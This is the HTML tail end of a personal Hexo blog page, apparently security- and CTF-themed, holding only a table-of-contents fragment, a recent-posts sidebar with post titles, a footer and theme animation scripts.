href="#%E7%81%AB%E7%9C%BC%E8%BE%A9%E9%AD%91%E9%AD%85%EF%BC%9A"><span class="toc-number">1.4.</span> <span class="toc-text">火眼辩魑魅：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%AB%AFGAME-Plus%EF%BC%9A"><span class="toc-number">1.5.</span> <span class="toc-text">前端GAME Plus：</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2025/05/10/TGCTFweb%E9%83%A8%E5%88%86/" title="TGCTFweb部分"><img src="/img/2.jpg" onerror="this.onerror=null;this.src='/img/4040.jpg'" alt="TGCTFweb部分"/></a><div class="content"><a class="title" href="/2025/05/10/TGCTFweb%E9%83%A8%E5%88%86/" title="TGCTFweb部分">TGCTFweb部分</a><time datetime="2025-05-10T07:24:39.000Z" title="发表于 2025-05-10 15:24:39">2025-05-10</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2025/04/24/php%E7%89%B9%E6%80%A7%E6%80%BB%E7%BB%93%E4%B8%8B/" title="php特性总结下"><img src="/img/17.jpg" onerror="this.onerror=null;this.src='/img/4040.jpg'" alt="php特性总结下"/></a><div class="content"><a class="title" href="/2025/04/24/php%E7%89%B9%E6%80%A7%E6%80%BB%E7%BB%93%E4%B8%8B/" title="php特性总结下">php特性总结下</a><time datetime="2025-04-24T12:27:13.000Z" title="发表于 2025-04-24 20:27:13">2025-04-24</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2025/04/24/php%E7%89%B9%E6%80%A7%E6%80%BB%E7%BB%93%E4%B8%8A/" title="php特性总结上"><img src="/img/8.jpg" onerror="this.onerror=null;this.src='/img/4040.jpg'" alt="php特性总结上"/></a><div class="content"><a class="title" href="/2025/04/24/php%E7%89%B9%E6%80%A7%E6%80%BB%E7%BB%93%E4%B8%8A/" title="php特性总结上">php特性总结上</a><time datetime="2025-04-24T11:33:11.000Z" title="发表于 2025-04-24 19:33:11">2025-04-24</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2025/04/22/SQL%E6%B3%A8%E5%85%A5/" title="SQL注入"><img src="/img/7.jpg" onerror="this.onerror=null;this.src='/img/4040.jpg'" alt="SQL注入"/></a><div class="content"><a class="title" href="/2025/04/22/SQL%E6%B3%A8%E5%85%A5/" title="SQL注入">SQL注入</a><time datetime="2025-04-22T14:01:51.000Z" title="发表于 2025-04-22 22:01:51">2025-04-22</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2025/04/20/%E7%8E%84%E6%9C%BA%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E4%B8%8A/" title="玄机应急响应上"><img src="/img/14.jpg" onerror="this.onerror=null;this.src='/img/4040.jpg'" alt="玄机应急响应上"/></a><div class="content"><a class="title" href="/2025/04/20/%E7%8E%84%E6%9C%BA%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E4%B8%8A/" title="玄机应急响应上">玄机应急响应上</a><time datetime="2025-04-20T13:52:14.000Z" title="发表于 2025-04-20 21:52:14">2025-04-20</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2024 - 2025 By Wea5e1</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><div class="js-pjax"></div><canvas id="universe"></canvas><script defer src="/js/universe.js"></script><canvas class="fireworks" mobile="false"></canvas><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/fireworks.min.js"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><!-- hexo injector body_end start --><div class="js-pjax"><script async="async">var arr = document.getElementsByClassName('recent-post-item');
for(var i = 0;i<arr.length;i++){
    arr[i].classList.add('wow');
    arr[i].classList.add('animate__zoomIn');
    arr[i].setAttribute('data-wow-duration', '2s');
    arr[i].setAttribute('data-wow-delay', '1s');
    arr[i].setAttribute('data-wow-offset', '100');
    arr[i].setAttribute('data-wow-iteration', '2');
  }</script><script async="async">var arr = document.getElementsByClassName('card-widget');
for(var i = 0;i<arr.length;i++){
    arr[i].classList.add('wow');
    arr[i].classList.add('animate__zoomIn');
    arr[i].setAttribute('data-wow-duration', '');
    arr[i].setAttribute('data-wow-delay', '');
    arr[i].setAttribute('data-wow-offset', '');
    arr[i].setAttribute('data-wow-iteration', '');
  }</script></div><script defer src="https://npm.elemecdn.com/hexo-butterfly-wowjs/lib/wow.min.js"></script><script defer src="https://npm.elemecdn.com/hexo-butterfly-wowjs/lib/wow_init.js"></script><!-- hexo injector body_end end --></body></html>